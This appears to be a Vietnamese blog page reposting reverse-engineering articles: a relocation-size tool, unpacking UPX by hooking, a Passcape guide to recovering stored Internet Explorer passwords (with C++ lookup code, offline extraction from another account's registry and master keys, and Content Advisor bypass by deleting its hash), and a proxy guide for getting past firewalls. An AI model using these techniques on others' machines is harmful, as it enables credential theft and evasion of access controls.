Trao đổi với tôi

www.hdphim.info OR www.chepphimhdtv.com

6/27/10

[Reverse] GetRelocSize

Some packers leave a dll's relocation directory intact (e.g. Armadildo). You just have to know the original reloc dir RVA which is easy to find in most cases.

However, you need to define the right reloc table size, since the PE loader subtracts every block from the size and checks for 0.
That means, you can't just guess and make it big enough to contain all elements. It has to be the exact size of the table.

Well, I was looking for a tool that could calculate the size but couldn't find any.
I started coding my own and that's the result :D

It takes a PE file, displays the correct size for the reloc table and optionally writes the right size to the file.
Supports both normal and PE32+ executables.

BEWARE! KOMMANDLINE-APPLIKASHUN!

Source and binary attached :)

Attached File(s)

  • Attached File GetRelocSize.zip (77.17K)

  • reflink:http://forum.tuts4you.com/index.php?s=8a2282d66b755d4ccdcf11bc2b3f14e9&app=blog&module=display&section=blog&blogid=4&showentry=42

[Hooking] Unpacking by hooking?

Lets try something totally crazy. Lets try dynamic unpacking without total unpacking control, without breakpoints, without any kind of debugging whatsoever. Lets merge our unpacking process with the packer itself binding them into one unique work flow that collects information while packer is executing. Similar to what we do with debugging just without the debugger. How do we do this? Can we for that matter?

We can, with the little help from the TitanEngine's hooking library. The idea is to have our unpacker as a library which will be injected to the packed file during its execution. Such library would place hooks inside the packer code which redirect the control flow to our unpacker where ever data collection or execution handling is needed. Those places are usually spots where packer processes the import table, relocations, jumps to the original entry point or just switches execution from one layer to another.

Benefits of such approach? Even though its slightly harder to create and test such unpacker most notable benefit of unpacking by hooking is total immunity to various anti-debugging tricks used to detect the unpacking process. Only detection applicable to this unpacking scenario is anti-hooking and memory checksumming. First is hardly ever used in modern protections due to large number of false positives it gives which are triggered by the operating system itself, security software and various window skinning applications. And the second one is rarely present and when it is it only covers specific memory regions that correspond to single protection layer. In conclusion this method of implementing the unpacking process should give less things to worry about.

Implementing this kind of hooks requires a building custom functions that process the hook events. This is necessary to maintain the packed program work flow and is exactly why we preserve the register state with PUSHAD and if there is a jump affected by our hook even EFLAGS with PUSHFD. These ASM instructions are embedded in our C code and with the help of naked pre-processor instruction they become the prologue and epilogue of the function. To apply the hooks we use the DLL_PROCESS_ATTACH event. For example if we were to hook the UPX code which loads libraries the hook code flow would look like this:

Since our hooks are 5 bytes we need to "borrow" as much instructions we need to insert the hook. In this case we are "borrowing" three instructions. These instructions will be executed right after our inserted function is called. This is done to preserve the packer work flow. As you can see from this diagram we are using hooks instead of breakpoints. Therefore these hooks will be placed on at-least three places. When UPX calls LoadLibraryA, GetProcAddress and finally once is jumps to the entry point. Most basic sample UPX unpacker is limited to working on executables which don't import functions by ordinals and use the old jump to entry point method. Quite limited but enough for our technique proof-of-concept.

Debugging this kind of unpackers can be rather tricky. This video shows a quick and easy way to do it:

Since we are creating a hook library unpacker we also need a loader which will execute the unpacking target and inject the unpacker library in it. This can be done in number of ways but we decided to do via debug - detach method. Once both unpacker hook library and the loader are made our unpacker is complete. We hope you got the idea on how to use this technique to build your own hooking unpackers from our short blog. Until next week...

upxHooks
(package contains the unpacker with source and the samples used)

reflink: http://blog.reversinglabs.com/2010/06/unpacking-by-hooking/

6/23/10

[Crypto] Recovering Internet Explorer passwords: theory and practice

Introduction
Types of passwords stored in Internet Explorer
Internet Credentials
AutoComplete data
AutoComplete passwords
FTP passwords
Synchronization passwords
Identities passwords
AutoForms data
Content Advisor password
Brief overview of Internet Explorer password recovery programs
PIEPR - the first acquaintance
Three real-life examples
Recovering current user's FTP passwords
Recovering website passwords from unloadable operating system
Recovering uncommonly stored passwords
Conclusion

Introduction

Nobody will likely dispute the fact that Internet Explorer is today's most popular Web browser. According to the statistics, approximately 70% of online users prefer to use just this program. Arguments about its pros and cons may last forever; still, this browser is the leader of its industry, and this is a fact that requires no proof. Internet Explorer carries several built-in technologies, designed to make average user's life easier. One of them - IntelliSense - is made for taking care of the routine tasks, like the automatic completion of visited webpage addresses, automatic filling of form fields, users' passwords, etc.

Many of today's websites require registration, which means, user would have to enter user name and password. If you use more than a dozen of such websites, you will likely need a password manager. All modern browsers have a built-in password manager in their arsenal, and Internet Explorer is not an odd. Indeed, why would one have to remember yet another password if it is going to be forgotten some time soon anyway? Much easier would be to have browser do the routine work of remembering and storing passwords for you. It's convenient and comfortable.

This would be a totally perfect solution; however, if your Windows operating system crashed or reinstalled not the way it's supposed to be reinstalled, you can easily lose the entire list of your precious passwords. That's the toll for the comfort and convenience. It's good just about every website has a saving 'I forgot password' button. However, this button will not always take your headache from you.

Each software developer solves the forgotten password recovery problem their own way. Some of them officially recommend copying a couple of important files to another folder, while other send all registered users a special utility that allows managing the migration of private data, and the third ones pretend they are not seeing the problem. Nevertheless, the demand creates the offer, and password recovery programs are currently on a great demand.

In this article, let's try to classify types of private data stored in Internet Explorer, look at programs for the recovery of the data, and study real-life examples of recovering lost Internet passwords.

Types of passwords stored in Internet Explorer

Internet Explorer may store the following types of passwords:

  • Internet Credentials
  • AutoComplete Data
  • AutoComplete Passwords
  • FTP Passwords
  • Synchronization Passwords for cached websites
  • Identities Passwords
  • AutoForms Data
  • Content Advisor Password

Let's take a closer look at each listed item.

Internet Credentials for websites

Internet credentials mean user's logins and passwords required for accessing certain websites, which are processed by the wininet.dll library. For example, when you try to enter the protected area of a website, you may see the following user name and password prompt (Figure 1).

Web site passwords
Figure 1. Internet Credentials dialog.


If the option 'Remember my password' is selected in that prompt, the user credentials will be saved to your local computer. The older versions of Windows 9х stored that data in user's PWL file; Windows 2000 and newer store it in the Protected Storage.

AutoComplete Data

AutoComplete data (passwords will be covered further) are also stored in the Protected Storage and appear as lists of HTML form field names and the corresponding user data. For example, if an HTML page contains an e-mail address entry dialog: once user has entered his e-mail address, the Protected Storage will have the HTML field name, the address value, and the time the record was last accessed.

The HTML page title and website address are not stored. Is that good or bad? It's difficult to determine; more likely to be good than bad. Here are the obvious pros: it saves free space and speeds up browser's performance. If you think the last note is insignificant, try to imagine how you would have to perform several extra checkups in a multi-thousand (this is not as rare as it may seem to be) auto-fill list.

Another obvious plus is that data for identical by name (and often by subject) HTML form fields will be stored in the same place, and the common data will be used for the automatic filling of such pages. We will see this by this example. If one HTML page contains an auto-fill field with the name 'email', and user entered his e-mail address in that field, IE will put in the storage, roughly, 'email=my@email.com'. From now on, if the user opens another website, which has a page with the same field name 'email', the user will be suggested to auto-fill it with the value that he entered on the first page (my@email.com). Thus, the browser somewhat discovers AI capabilities within itself.

The major drawback of this data storage method comes out of its advantage that we just described. Imagine, user has entered auto-fill data on a webpage. If someone knows the HTML form field name, that person can create his own simplest HTML page with the same field name and open it from a local disk. To uncover the data entered in this field, such person will not even have to connect to the Internet and open the original WWW address.

AutoComplete Passwords

In the case with passwords data, however, as you might have guessed, the data will not be filled in automatically. Since auto-complete passwords are stored along with the Web page name, and each password is bound to only one specific HTML page.

In the new version, Internet Explorer 7, both AutoComplete passwords and data are encrypted completely different; the new encryption method is free from the shortcoming just described (if that can be classified as a shortcoming.)

It is worth noticing that Internet Explorer allows users to manage auto-fill parameters manually, (Figure 2) through the options menu.

Internet Explorer AutoComplete  settings
Figure 2. Internet Explorer AutoComplete settings.

FTP passwords

FTP site passwords are stored pretty much the same way. It would be relevant to notice that beginning with Windows XP FTP passwords are additionally encrypted with DPAPI. This encryption method uses logon password. Naturally, this makes it much more difficult to recover such lost passwords manually, since now one would need to have the user's Master Key, SID and the account password.

Synchronization Passwords for cached websites

Synchronization passwords free user from having to enter passwords for cached websites (sites set to be available offline.) Passwords of this type are also stored in IE's Protected Storage.

Identities passwords

So are identities passwords. The identity-based access management mechanism is not widespread in Microsoft's products, except, perhaps, Outlook Express.

AutoForms Data

A special paragraph must cover the form auto-fill method, which constitutes a hybrid way of storing data. This method stores the actual data in the Protected Storage, and the URL, which the data belong to, is stored in user's registry. The URL written in the registry is stored not as plaintext - it is stored as hash. Here is the algorithm for reading form auto-fill data in IE 4 - 6:

//Get autoform password by given URL
BOOL CAutoformDecrypter::LoadPasswords(LPCTSTR cszUrl, CStringArray *saPasswords)
{
assert(cszUrl && saPasswords);

saPasswords->RemoveAll();

//Check if autoform passwords are present in registry
if ( EntryPresent(cszUrl) )
{
//Read PStore autoform passwords
return PStoreReadAutoformPasswords(cszUrl,saPasswords);
}

return FALSE;
}


//Check if autoform passwords are present
BOOL CAutoformDecrypter::EntryPresent(LPCTSTR cszUrl)
{
assert(cszUrl);

DWORD dwRet, dwValue, dwSize=sizeof(dwValue);
LPCTSTR cszHash=GetHash(cszUrl);

//problems computing the hash
if ( !cszHash )
return FALSE;

//Check the registry
dwRet=SHGetValue(HKCU,_T("Software\Microsoft\Internet Explorer\IntelliForms\SPW"), cszHash, NULL, &dwValue, &dwSize);
delete((LPTSTR)cszHash);

if ( dwRet==ERROR_SUCCESS )
return TRUE;

m_dwLastError=E_NOTFOUND;
return FALSE;
}


//retrieve hash by given URL text and translate it into hex format
LPCTSTR CAutoformDecrypter::GetHash(LPCTSTR cszUrl)
{
assert(cszUrl);

BYTE buf[0x10];
LPTSTR pRet=NULL;
int i;

if ( HashData(cszUrl,buf,sizeof(buf)) )
{
//Allocate some space
pRet=new TCHAR [sizeof(buf) * sizeof(TCHAR) + sizeof(TCHAR)];
if ( pRet)
{
for ( i=0; i<sizeof(buf); i++ )
{
// Translate it into human readable format
pRet[i]=(TCHAR) ((buf[i] & 0x3F) + 0x20);
}
pRet[i]=_T('');
}
else
m_dwLastError=E_OUTOFMEMORY;
}

return pRet;
}


//DoHash wrapper
BOOL CAutoformDecrypter::HashData(LPCTSTR cszData, LPBYTE pBuf,
DWORD dwBufSize)
{
assert(cszData && pBuf);

if ( !cszData || !pBuf )
{
m_dwLastError=E_ARG;
return FALSE;
}

DoHash((LPBYTE)cszData,strlen(cszData),pBuf,dwBufSize);
return TRUE;
}


void CAutoformDecrypter::DoHash(LPBYTE pData, DWORD dwDataSize,
LPBYTE pHash, DWORD dwHashSize)
{
DWORD dw=dwHashSize, dw2;

//pre-init loop
while ( dw-->0 )
pHash[dw]=(BYTE)dw;

//actual hashing stuff
while ( dwDataSize-->0 )
{
for ( dw=dwHashSize; dw-->0; )
{
//m_pPermTable = permutation table
pHash[dw]=m_pPermTable[pHash[dw]^pData[dwDataSize]];
}
}
}

The next, seventh generation of the browser, is most likely going to make this user's data storage mechanism its primary data storage method, declining the good old Protected Storage. Better to say, auto-fill data and passwords, from now on, are going to be stored here.

What is so special and interesting in this mechanism that made MS decide to use it as primary? Well, first of all, it was the encryption idea, which isn't new at all but still simple and genius, to disgrace. The idea is to quit storing encryption keys and generate them whenever that would be necessary. The raw material for such keys would be HTML page's Web address.

Let's see how this idea works in action. Here is IE7's simplified algorithm for saving auto-fill data and password fields:

  1. Save Web page's address. We will use this address as the encryption key (EncryptionKey).
  2. Obtain Record Key. RecordKey = SHA(EncryptionKey).
  3. Calculate checksum for RecordKey to ensure the integrity of the record key (the integrity of the actual data will be guaranteed by DPAPI.) RecordKeyCrc = CRC(RecordKey).
  4. Encrypt data (passwords) with the encryption key EncryptedData = DPAPI_Encrypt(Data, EncryptionKey).
  5. Save RecordKeyCrc + RecordKey + EncryptedData in the registry.
  6. Discard EncryptionKey.


It is very, very difficult to recover password without having the original Web page address. The decryption looks pretty much trivial:

  1. When the original Web page is open, we take its address (EncryptionKey) and obtain the record key RecordKey = SHA(EncryptionKey).
  2. Browse through the list of all record keys trying to locate the RecordKey.
  3. If the RecordKey is found, decrypt data stored along with this key using the EncryptionKey. Data = DPAPI_Decrypt(EncryptedData, EncryptionKey).

In spite of the seeming simplicity, this Web password encryption algorithm is one of today's strongest. However, it has a major drawback (or advantage, depending which way you look at it.) If you change or forget the original Web page address, it will be impossible to recover password for it.

Content Advisor password

And the last item on our list is Content Advisor password. Content Advisor was originally developed as a tool for restricting access to certain websites. However, for some reason it was unloved by many users (surely, you may disagree with this.) If you once turned Content Advisor on, entered a password and then forgot it, you will not be able to access the majority of websites on the Internet. Fortunately (or unfortunately), this can be easily fixed.

The actual Content Advisor password is not stored as plaintext. Instead, the system calculates its MD5 hash and stores it in Windows registry. On an attempt to access the restricted area, the password entered by user is also hashed, and the obtained hash is compared with the one stored in the registry. Take a look at PIEPR source code checking Content Advisor password:

void CContentAdvisorDlg::CheckPassword()
{
CRegistry registry;

//read the registry
registry.SetKey(HKLM, "SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Ratings");

BYTE pKey[MD5_DIGESTSIZE], pCheck[MD5_DIGESTSIZE];
if ( !registry.GetBinaryData("Key",pKey,MD5_DIGESTSIZE) )
{
MessageBox(MB_ERR,"Can't read the password.");
return;
}

//Get one set by user
CString cs;
m_wndEditPassword.GetWindowText(cs);
MD5Init();
MD5Update((LPBYTE)(LPCTSTR)cs,cs.GetLength()+1);
MD5Final(pCheck);

//Check hashes
if ( memcmp(pKey,pCheck,MD5_DIGESTSIZE)==0 )
MessageBox(MB_OK,"The password is correct!");
else
MessageBox(MB_OK,"Wrong password.");
}

The first thing you may think about is to try to pick the password by using the brute force or dictionary attack. However, there is a more elegant way to that. You can simply remove the hash from the registry. That's it; so simple... Well, it's better to rename it instead, so that if you ever need it, you can restore it back. Some programs also let users check CA password, "drag out" password hint, toggle password on/off, etc.

Brief Overview of Internet Explorer Password Recovery Programs

It's worth noticing that not all password recovery programs suspect there are so many ways to recover passwords. Most likely, this is related to the fact that some passwords (e.g., synchronization passwords) are not often used in the real life, and FTP passwords are not so simple to be 'dragged out'. Here is a brief overview of the most popular commercial products for recovering passwords for the most popular browser on earth :)

Advanced Internet Explorer Password Recovery from the not unknown company, ElcomSoft - does not recognize AutoForm passwords and encrypted FTP passwords. Not to be excluded, the last version of the program may have learnt to do that. Simple, convenient user interface. The program can be upgraded online automatically.

Internet Explorer Key from PassWare - similarly, does not recognize certain types of passwords. Sometimes the program halts with a critical error when reading some uncommon types of IE's URLs. Displays first two characters of passwords being recovered. The advantages worth noticing are the Spartan user interface and operating convenience.

Internet Explorer Password from Thegrideon Software - not bad, but can recover just three types of Internet Explorer passwords (this is enough for the majority of cases.) Deals with FTP passwords properly. Version 1.1 has problems recovering AutoForm passwords. Has convenient user interface, which in some way reminds one from AIEPR. One can be totally overwhelmed with the beauty and helpfulness of the company's website.

Internet Password Recovery Toolbox from Rixler Software - offers some greater functionality than the previously covered competitors. It can recover encrypted FTP passwords and delete selected resources. However, it has some programming errors. For example, some types of IE records cannot be deleted. The program comes with a great, detailed help file.

ABF Password Recovery from ABF software - quite a good program with friendly user interface. The list of IE record types supported by the program is not long. Nevertheless, it deals with all of them properly. The program can be classified as a multi-functional one, since it can restore passwords for other programs also.

The major drawback of all programs named here is the capability to recover passwords only for user currently logged on.

As it was said above, the general body of stored Internet Explorer resources is kept in a special storage called Protected Storage. Protected Storage was developed specially for storing personal data. Therefore the functions for working with it (called PS API) are not documented. Protected Storage was first introduced with the release of the version 4 of Internet Explorer, which, by the way, unlike the third version, was written from scratch.

So, until very recent time, all programs for recovering Internet Explorer passwords used those undocumented API. That's the reason why one significant restriction was applied to the recovery work: PS API can only work with passwords for user that is currently logged on. When the system encrypts data stored in Protected Storage, besides everything else it uses user's SID, without which it is literally impossible (taking into account the current level of computers' calculating performance) to recover stored passwords.

Protected Storage uses a very well thought through data encryption method, which uses master keys and strong algorithms, such as des, sha, and shahmac. Similar data encryption methods are now used in the majority of modern browsers; e.g. in Opera or FireFox. Microsoft, meanwhile, quietly but surely develops and tests new ones. When this article is written, in the pre-Beta version of Internet Explorer 7 Protected Storage was only used for storing FTP passwords.

The analysis of this preliminary version suggests that Microsoft is preparing another 'surprise' in the form of new, interesting encryption algorithms. It is not known for sure, but most likely the new company's data protection technology InfoCard will be involved in the encryption of private data.

Thus, with a great deal of confidence one can assert that with the release of Windows Vista and the 7th version of Internet Explorer passwords will be stored and encrypted with fundamentally new algorithms, and the Protected Storage interface, to all appearances, will become open for third-party developers.

It is somewhat sad, for we think the true potential of Protected Storage was still not uncovered. And this is why we think so:

  • First, Protected Storage is based on module structure, which allows plugging other storage providers to it. However, for the last 10 years while Protected Storage exists, not a single new storage provider was created. System Protected Storage is the only storage provider in the operating system, which is used by default.

  • Second, Protected Storage has its own, built-in access management system, which, for some reason, is not used in Internet Explorer or in other MS products.
  • Third, it is not very clear why MS have decided to decline Protected Storage in storing AutoComplete data and passwords. Decline it as a tried and true data storage, and not data encryption mechanism. It would be more logically proven to keep Protected Storage at least for storing data when implementing a new encryption algorithm. Without fail, there were weighty reasons for that. Therefore, it would be interesting to hear the opinion of MS specialists concerning this subject matter.

PIEPR - the First Acquaintance

Passcape Internet Explorer Password Recovery was developed specifically to bypass the PS API's restriction and make it possible to recover passwords directly, from the registry's binary files. Besides, it has a number of additional features for advanced users.

The program's wizard allows you to choose one of several operating modes:

Automatic
Current user's passwords will be recovered by accessing the closed PS API interface. All current user's passwords currently stored in Internet Explorer will be recovered with a single click of the mouse.

Manual
Passwords will be recovered without PS API. This method's main advantage is the capability to recover passwords from your old Windows account. For that purpose, you will need to enter path to the user's registry file. Registry files are normally not available for reading; however, the technology used in PIEPR allows doing that (provided you have the local administrative rights.)

User's registry file name is ntuser.dat; its resides in the user's profile, which is normally %SYSTEMDRIVE%:\Documents and Settings\%USERNAME%, where %SYSTEMDRIVE% stands for the system disk with the operating system, and %USERNAME% is normally account name. For instance, path to registry file may look like this: C:\Documents and Settings\Johnnt\user.dat

If you have ever been a happy owner of Windows 9x/ME, after you upgrade your operating system to Windows NT, Protected Storage will providently save a copy of your old private data. As a result of that, Protected Storage may contain several user identifiers, so PIEPR will ask you to select the right one before it gets to the decryption of the data (Figure 3).

Protected Storage user  selection
Figure 3. Selecting Protected Storage owner.


One of the listed SIDs will contain data left by the old Windows 9x/ME. That data is additionally encrypted with user's logon password, and PIEPR currently does not support the decryption of such data.

If ntuser.dat contains encrypted passwords (e.g., FTP sites passwords), the program will need additional information in order to decrypt them (Figure 4):

  • Logon password of user whose data are to be decrypted
  • Full path to the user's MasterKey
  • User's SID

DPAPI decryption
Figure 4. DPAPI decryption dialog for FTP passwords.

Normally, the program finds the last two items in user's profile and fills that data automatically. However, if ntuser.dat was copied from another operating system, you will have to take care of that on your own. The easiest way to get the job done is to copy the entire folder with user's Master Key (there may be several of them) to the folder with ntuser.dat. Master Key resides in the following folder on your local computer: %SYSTEMDRIVE%:\Documents and Settings\%USERNAME%\Application Data\Microsoft\Protect\%UserSid%, where %SYSTEMDRIVE% stands for the system disk with the operating system, %USERNAME% - account name, %UserSid% - user's SID. For example, path to the folder with a master key may look as follows: C:\Documents and Settings\John\Application Data\Microsoft\Protect\S-1-5-21-1587165142-6173081522-185545743-1003. Let's make it clear that it is recommended to copy the entire folder S-1-5-21-1587165142-6173081522-185545743-1003, for it may contain several Master Keys. Then PIEPR will select the right key automatically.

Windows marks some folders as hidden or system, so they are invisible in Windows Explorer. To make them visible, enable showing hidden and system objects in the view settings or use an alternative file manager.

Once the folder with user's Master Key was copied to the folder with ntuser.dat, PIEPR will automatically find the required data, so you will only have to enter user's password for recovering FTP passwords.

Content Advisor
CA passwords, as it was said already, is not kept as plain text; instead, it is stored as hash. In the CA password management dialog, it is enough to just delete (you can restore the deleted password at any time later) or change this hash to unlock sites locked with CA. PIEPR will also display your password hint if there is one.

Asterisks passwords
PIEPR's fourth operating mode, which allows recovering Internet Explorer passwords hidden behind asterisks. To recover such password, simply drag the magnifier to the window with a **** password. This tool allows recovering passwords for other programs that use IE Frames as well; e.g., Windows Explorer, some IE-based browsers, etc.

We have reviewed the basic Internet Explorer password recovery modes. There is also a number of additional features for viewing and editing cookies, cache, visited pages history, etc. We are not going to cover them in detail; instead, we are going to look at a few password recovery examples done with PIEPR.

Three Real-Life Examples.
Example 1: Recovering current user's FTP password

When opening an FTP site, Internet Explorer pops up the log on dialog (Figure 5).

FTP password dialog
Figure 5. FTP logon dialog.

If you have opened this site and set the 'Save password' option in the authentication dialog, the password must be saved in Protected Storage, so recovering it is a pretty trivial job. Select the automatic operating mode in PIEPR and then click 'Next'. Locate our resource in the dialog with decrypted passwords that appears (the site name must appear in the Resource Name column.)

As we see, the decryption of current user's password should not cause any special difficulties. Oh, if the password is not found for some reason - don't forget to check IE's Auto-Complete Settings (Figure 2). Possibly, you have simply not set the program to save passwords.

Three Real-Life Examples.
Example 2: We will need to recover Web site passwords. The operating system is unbootable.

This is a typical, but not fatal situation. The necessity to recover Internet Explorer passwords after unsuccessful Windows reinstallation occurs just as often.

In either case, we will have user's old profile with all files within it. This set is normally enough to get the job done. In the case with the reinstallation, Windows providently saves the old profile under a different name. For example, if your account name was John, after renaming it may look like John.WORK-72C39A18.

The first and the foremost what you must do is to gain access to files in the old profile. There are two ways to doing this:

  1. Install a new operating system on a different hard drive; e.g., Windows XP, and hook the old hard drive to it.

  2. Create a Windows NT boot disk. There are many different utilities for creating boot disks and USB flash disks available online. For instance, you can use WinPE or BartPE. Or just use our Passcape ISO Burner. If your old profile was stored on an NTFS part of your hard drive, the boot disk will have to support NTFS.

Let's take the first route. Once we gain access to the old profile, we will need to let the system show hidden and system files. Otherwise, the files we need will be invisible. Open Control Panel, then click on Folder Options, and then select the View tab. On this tab, find the option 'Show hidden files and folders' and select it. Clear the option 'Hide protected operating system files'. When the necessary passwords are recovered, it's better to reset these options to the way they were set before.

Open the program's wizard in the manual mode and enter path to the old profile's registry file. In our case, that is C:\Documents And Settings\John.WORK-72C39A18\ntuser.dat. Where John.WORK-72C39A18 is the old account name. Click 'Next'.

This data should normally be sufficient for recovering Internet Explorer passwords. However, if there is at least a single encrypted FTP password, the program will request additional data, without which it will not be able to recover such types of passwords (Figure 4):

  • User's password
  • User's Master Key
  • User's SID.

Normally, the program finds the last two items in user's profile and fills that data automatically. However, if that didn't happen, you can do that by hand: copy ntuser.dat and the folder with the Master Key to a separate folder. It is important to copy the entire folder, for it may contain several keys, and the program will select the right one automatically. Then enter path to file ntuser.dat that you have copied to another folder.

That's it. Now we need to enter the old account password, and the recovery will be completed. If you don't care for FTP password, you can skip the user's password, Master Key, and SID entry dialog.

Three Real-Life Examples.
Example 3: Recovering uncommonly stored passwords.

When we sometimes open a website in the browser, the authentication dialog appears. However, PIEPR fails to recover it in either automatic or manual mode. The 'Save password' option in Internet Explorer is enabled. We will need to recover this password.

Indeed, some websites don't let browser to save passwords in the auto-complete passwords list. Often, such websites are written in JAVA or they use alternative password storage methods; e.g., they store passwords in cookies.

If the password field is filled with asterisks, the solution is clear: select the ASTERISKS PASSWORDS operating mode and then open the magic magnifier dialog. Then simply drag the magnifier to the Internet Explorer window (Figure 6).

Asterisks passwords revealer
Figure 6. The password is behind the asterisks.

The password (passwords, if the Internet Explorer window has several fields with asterisks) is to appear in the PIEPR window (Figure 7).

Internet Explorer asterisks  passwords
Figure 7. Magnifying glass in use.

But it's not always that simple. The password field may be empty or that field may indeed contain *****. In this case, as you have guessed by now, the ASTERISKS PASSWORDS tool will be useless.

We can suppose, the password is stored in cookies. Let's try to locate it. Choose the IE Cookie Explorer tool (Figure 8).

IE Cookie Explorer
Figure 8. IE Cookie Explorer.

The dialog that appears will list the websites that store cookies on your computer. Click on the URL column header to order the websites list alphabetically. This will help us find the right website easier. Go through the list of websites and select the one we need. The list below will display the decrypted cookies for this website (Figure 9).

Decrypted cookies
Figure 9. Decrypted cookies.

As the figure shows, in our case the login and password are not encrypted and are stored as plain text.

Cookies are often encrypted. In this case, you are not likely to succeed recovering the password. The only thing you can try doing in order to recover the old account is to create a new account. Then you will be able to copy the old cookies in a text editor and replace them with the new ones. However, this is only good when the worst comes to the worst; it is not recommended to use it normally.

Don't forget also that just about all pages and forms with passwords have the 'Forgot password' button.

Conclusion

As this article shows, recovering Internet Explorer passwords is a pretty simple job, which does not require any special knowledge or skills. However, despite of the seeming simplicity, password encryption schemes and algorithms are very well thought through and just as well implemented. Although the Protected Storage concept is over 10 years of age, don't forget that it has proven the very best recommendations of the experts and has been implemented through three generations of this popular browser.

With the release of the next, 7th version of IE, Microsoft is preparing fundamentally new schemes for protecting our private data, where it uses improved encryption algorithms and eliminates shortages peculiar to Protected Storage.

In particular, the analysis of the preliminary beta versions of Internet Explorer 7 has revealed that autoform password encryption keys are no longer stored along with data. They are not stored, period! This is a little know-how, which is to be estimated at its true worth by both professionals and end users, who, finally, will benefits of it anyway.

But the main thing is, the release of the new concept will eliminate the major drawback peculiar to Protected Storage, which is the possibility to recover passwords without knowing the additional information. Better to say, was enough for a potential hacker to gain physical access to the contents of a hard drive, in order to steal or damage passwords and user's other private data. With the release of Internet Explorer 7, the situation will somewhat change.

Meanwhile, we will only have to wait impatiently for the advent of Windows Vista and IE 7 to take a closer look at new encryption mechanisms used in the next generation of this popular browser.

This document may be freely distributed or reproduced provided that the
reference to the original article is placed on each copy of this document.
(c) 2006 Passcape Software. All rights reserved.



*1 Human's memory can be split into two categories: short-term memory and long-term memory. For the purposes of memorizing information, human beings activate short-term memory, which is characterized by limited volume. When the volume is overloaded, new information that enters the memory, partially pushes the old information out, which permanently disappears. To store information in the short-term memory, one needs to keep constant attention to material being memorized for the entire period while the material is to be in the memory. If one doesn't repeat the information stored in the memory for a certain period of time (e.g., a new password), that information can permanently or fragmentarily fall out of the conscience sphere and never end up in the long-term memory.

*2 USERNAME.PWL (where USERNAME is your logon name) is a PassWord List file. It records passwords to resources on the network and uses them to reconnect to those resources so you don't have to type the password again.

*3 Protected Storage provides applications with an interface to store user data that must be kept secure or free from modification. Units of data stored are called Items. The structure and content of the stored data is opaque to the Protected Storage system. Access to Items is subject to confirmation according to a user-defined Security Style, which specifies what confirmation is required to access the data, such as whether a password is required. In addition, access to Items is subject to an Access rule set. There is an Access rule for each Access Mode: for example, read/write. Access rule sets are composed of Access Clauses. Typically at application setup time, a mechanism is provided to allow a new application to request from the user access to Items that may have been created previously by another application.
Items are uniquely identified by the combination of a Key, Type, Subtype, and Name. The Key is a constant that specifies whether the Item is global to this computer or associated only with this user. The Name is a string, generally chosen by the user. Type and Subtype are GUIDs, generally specified by the application. Additional information about Types and Subtypes is kept in the system registry and include attributes such as Display Name and UI hints. For Subtypes, the parent Type is fixed and included in the system registry as an attribute. The Type group Items is used for a common purpose: for example, Payment or Identification. The Subtype group Items share a common data format.
We'll try to cover the Protected Storage structure in one of the upcoming articles.

*4 Starting with Microsoft Windows 2000, the operating system began to provide a Data Protection Application-Programming Interface (DPAPI) API. This is simply a pair of function calls that provide OS-level data protection services to user and system processes. By OS-level, we mean a service that is provided by the operating system itself and does not require any additional libraries. By data protection, we mean a service that provides confidentiality of data through encryption. Since the data protection is part of the OS, every application can now secure data without needing any specific cryptographic code other than the necessary function calls to DPAPI. These calls are two simple functions with various options to modify DPAPI behavior. Overall, DPAPI is a very easy-to-use service that will benefit developers that must provide protection for sensitive application data, such as passwords and private keys.
DPAPI is a password-based data protection service: it requires a password to provide protection. The drawback, of course, is that all protection provided by DPAPI rests on the password provided. This is offset by DPAPI using proven cryptographic routines, specifically the strong Triple-DES and AES algorithms, and strong keys, which we'll cover in more detail later. Since DPAPI is focused on providing protection for users and requires a password to provide this protection, it logically uses the user's logon password for protection.
DPAPI is not responsible for storing the confidential information it protects. It is only responsible for encrypting and decrypting data for programs that call it, such as Windows Credential manager, the Private Key storage mechanism, or any third-party programs.
Please refer to microsoft.com for more information.

*5 A Master Key is key data material from which other encryption/decryption keys are derived.

*6 SID - Security IDentifier

*7 A cookie is a small bit of text that accompanies requests and pages as they go between the Web server and browser. The cookie contains information the Web application can read whenever the user visits the site. Cookies provide a useful means in Web applications to store user-specific information. For example, when a user visits your site, you can use cookies to store user preferences or other information. When the user visits your Web site another time, the application can retrieve the information it stored earlier.
Cookies are used for all sorts of purposes, all relating to helping the Web site remember you. In essence, cookies help Web sites store information about visitors. A cookie also acts as a kind of calling card, presenting pertinent identification that helps an application know how to proceed.
But often cookies criticized for weak security and inaccurate user identification.
Please refer to microsoft.com to read more.


reflink: http://www.passcape.com/internet_explorer_passwords

[Net] Sock

Tại sao phải fake Ip?
Trên mạng hiện nay có rất nhiều web cho tải phần mềm và đăng ký host, nhưng đa số đều hạn chế số IP của Việt Nam (tại dùng chùa quá nhiều) nên bạn phải fake IP để thuận tiện hơn khi làm những công việc trên.
Hai cách Fake IP

Proxy có 2 loại SOCK Proxy và HTTP Proxy. Về mức độ nậc danh thì Sock an toàn cao hơn.

Mục đích:

+ Ẩn danh trên Net, bảo vệ thông tin.
+ Vượt Firewall. Nếu nơi bạn làm việc bị chặn bởi Firewall, thì Proxy là giải pháp để bạn truy cập ra những website bên ngoài.

Thực hiện: Minh họa bằng trình duyệt Internet Explorer

+ HTTP Proxy
Tools menu --> Internet Options --> Connection tabs --> LAN Settings




+ SOCK Proxy
Tools menu --> Internet Options --> Connection tabs --> LAN Settings --> Advanced





Những website cung cấp Proxy:

www.freeproxy.ru
www.rrdb.org
www.proxycity.com
www.proxy4free.com
www.aliveproxy.com

Cách hai:

Fake IP bằng Sockcap

Unzip và chạy không cần cài đặt. Đầu tiên Sockcap yêu cầu config, làm theo hình:



Vì chúng ta cần fake IP cho trình duyệt Internet Explorer nên phải chỉ cho Sockcap hiểu:









Click 2 lần vào biểu tượng Internet Explorer trong Sockcap để mở. Chú ý là phải mở IE thông qua Sockcap như thế.
Kiểm tra xem IP đã thay đổi chưa: vào đây --> www.ip2location.com
Nếu bạn dùng proxy có IP ở US thì nó sẽ thông báo IP hiện nay của mình ở US. Tuyệt lắm phải không !?


@Sưu tầm !

Cách fake IP với trình duyệt web FireFox! nếu ai dùng thì làm như này nhé!
Chọn Menu Tools => Vào tab Options... => Bảng dưới

vào đó rồi vào tab Advanced có gạch đỏ nha! nó sẽ ra bảng này:

Chọn tab Network và chọn nút Settings nha, nó ra bảng này.


Bạn tích theo cái ô mình khoanh mầu đỏ nha!
